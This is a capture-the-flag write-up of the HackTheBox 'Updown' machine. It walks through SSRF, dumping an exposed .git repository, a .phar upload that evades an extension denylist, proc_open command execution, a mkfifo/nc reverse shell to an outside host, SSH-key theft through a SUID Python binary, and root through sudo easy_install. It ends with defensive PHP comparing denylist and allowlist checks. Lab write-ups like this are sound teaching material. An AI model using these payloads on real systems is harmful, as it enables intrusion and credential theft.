# HackTheBox - Updown

## NMAP

```bash
Nmap scan report for 10.10.11.177
Host is up (0.11s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Is my Website up ?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## PORT 80 (HTTP)

The web page has a functionality to check whether any site is up. It also shows us a domain name, `siteisup.htb`, so let's add it to the hosts file.

With the debug mode enabled we can see the response made to the URL, which leads to Server Side Request Forgery (SSRF).

I tried using the file protocol to read a local file (`file:///etc/passwd`) but it was blocked.

On the domain name, we can fuzz for subdomains with `wfuzz`:

```bash
wfuzz -c -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://siteisup.htb' -H "Host: FUZZ.siteisup.htb" --hh 1131
```

This finds a subdomain `dev` with a 403 status code.

We can try accessing it through the status check, as there exists an SSRF, but it shows that it's down, so there may be some filtering going on.

On the dev site, fuzzing for files and directories shows `/dev`, but it returns a blank page. So fuzzing at `/dev/`, we'll find `.git`.

We can download `.git` through `wget` with `--recursive`:

```bash
wget --recursive http://10.10.11.177/dev/.git/
```

After downloading the files, navigate to the directory which has `.git` and run `git checkout .` to recover the files.

Checking `changelog.txt`, it talks about removing the upload option.

The `.htaccess` file shows us a header: if it's not in the request, the request will be denied. I used a Burp extension called `Add Custom Header` so that the special header gets added on every request.

Looking at `checker.php`, it checks file extensions, which may lead to uploading PHP files to get code execution. It's checking for all extensions except `.phar`, but even if we upload one, it's going to read the contents of the file, make a request to see if there's a 200 status code, and delete the file after making a request to each of the entries in the file.

To get code execution, we can make the site request a site which isn't reachable, so it's going to keep trying to reach that site for some time and our uploaded file won't get deleted.

## Foothold

From `phpinfo()` we can see that most of the functions that could allow command execution are disabled. To find out which function can be used to get command execution, we can use this script: https://github.com/teambi0s/dfunc-bypasser

We can abuse `proc_open` to get command execution: https://www.macs.hw.ac.uk/~hwloidl/docs/PHP/function.proc-open.html

```php
<?php
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("file", "/tmp/error-output.txt", "a") // stderr is a file to write to
);

$process = proc_open("bash", $descriptorspec, $pipes);

if (is_resource($process)) {
    // $pipes now looks like this:
    // 0 => writeable handle connected to child stdin
    // 1 => readable handle connected to child stdout
    // Any error output will be appended to /tmp/error-output.txt

    fwrite($pipes[0], "id");
    fclose($pipes[0]);

    while (!feof($pipes[1])) {
        echo fgets($pipes[1], 1024);
    }
    fclose($pipes[1]);

    // It is important that you close any pipes before calling
    // proc_close in order to avoid a deadlock
    $return_value = proc_close($process);

    echo "command returned $return_value\n";
}
?>
```

On uploading the file, we'll get the output of the `id` command.

Using `nc` and `mkfifo` we can get a reverse shell:

```bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.72 2222 >/tmp/f
```

## Privilege Escalation (developer)

In `developer`'s directory we can find the `siteisup` binary along with its source code, which runs as developer because of SUID.

We can exploit this by importing the `os` module and executing the `id` command:

```python
__import__('os').system('id')
```

From here we can get the SSH key and log in as the developer user:

```python
__import__('os').system('cat /home/developer/.ssh/id_rsa')
```

## Privilege Escalation (root)

Running `sudo -l` will show that we can run `/usr/local/bin/easy_install` as the root user. We can abuse this by checking GTFOBins: https://gtfobins.github.io/gtfobins/easy_install/
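Looking back at the extension check in `checker.php`: the root cause of the foothold is a denylist that does not know about `.phar`. The following is an added example, not the box's code, showing a denylist check in that spirit beside an allowlist check that closes the gap; the extension lists and the sample file names are constructed for illustration.

```php
<?php
// Denylist in the spirit of the original check (constructed list, not the
// box's actual one). "phar" is missing, and the PHP handler still executes it.
const DENIED_EXTENSIONS = ['php', 'php3', 'php4', 'php5', 'php7', 'phtml', 'phps'];

// Hardened alternative: only the plain-text site list the feature needs.
const ALLOWED_EXTENSIONS = ['txt'];

function extensionOf(string $filename): string {
    // Lower-case so "shell.PHAR" is treated the same as "shell.phar".
    return strtolower(pathinfo($filename, PATHINFO_EXTENSION));
}

// Denylist check: rejects only extensions it has been told about.
function denylistAllows(string $filename): bool {
    return !in_array(extensionOf($filename), DENIED_EXTENSIONS, true);
}

// Allowlist check: rejects anything not explicitly approved and refuses
// double extensions such as "shell.txt.phar" or dotfiles such as ".htaccess".
function allowlistAllows(string $filename): bool {
    $parts = explode('.', basename($filename));
    if (count($parts) !== 2 || $parts[0] === '') {
        return false; // no extension, more than one, or a dotfile
    }
    return in_array(strtolower($parts[1]), ALLOWED_EXTENSIONS, true);
}

// Constructed sample uploads: one legitimate list and three that a
// denylist-only check lets through or should not.
foreach (['sites.txt', 'shell.php', 'shell.phar', 'shell.txt.phar', '.htaccess'] as $name) {
    printf("%-16s denylist:%-5s allowlist:%s\n", $name,
        denylistAllows($name) ? 'allow' : 'deny',
        allowlistAllows($name) ? 'allow' : 'deny');
}
```

Run it with `php` and compare the two columns: the denylist column is where the `.phar` upload slips through, the allowlist column is the behaviour you want on an upload endpoint.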